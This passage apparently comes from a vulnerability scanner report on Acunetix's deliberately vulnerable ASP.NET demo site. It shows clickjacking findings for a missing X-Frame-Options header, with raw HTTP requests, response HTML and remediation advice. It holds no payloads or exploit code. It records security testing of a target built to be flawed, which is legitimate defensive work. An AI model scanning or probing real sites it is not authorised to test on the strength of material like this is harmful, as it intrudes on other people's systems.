          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        18. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        19. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
